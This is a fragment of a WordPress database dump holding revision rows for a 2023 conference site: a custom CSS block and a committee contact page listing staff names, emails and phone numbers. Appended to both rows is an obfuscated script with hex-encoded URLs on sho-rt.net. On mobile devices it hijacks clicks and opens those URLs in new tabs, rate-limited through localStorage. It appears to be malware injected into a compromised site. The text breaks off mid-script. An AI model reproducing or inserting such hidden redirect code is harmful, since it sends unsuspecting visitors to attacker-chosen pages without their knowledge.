13:13:43','',4849,'https://gsw2023.com/?p=4929',0,'revision','',0),
(4931,4,'2023-06-27 13:21:08','2023-06-27 13:21:08','#bottom-bar .wf-float-left{\n	display: none !important;\n}\n#bottom-bar .wf-float-right .bottom-text-block{\n	float: none !important;\n	width: 100% !important;\n	text-align: center !important;\n}\n\n\n.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 13:21:08','2023-06-27 13:21:08','',4823,'https://gsw2023.com/?p=4931',0,'revision','',0),
(4932,4,'2023-06-27 13:21:16','2023-06-27 13:21:16','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871415968{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687871444230{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 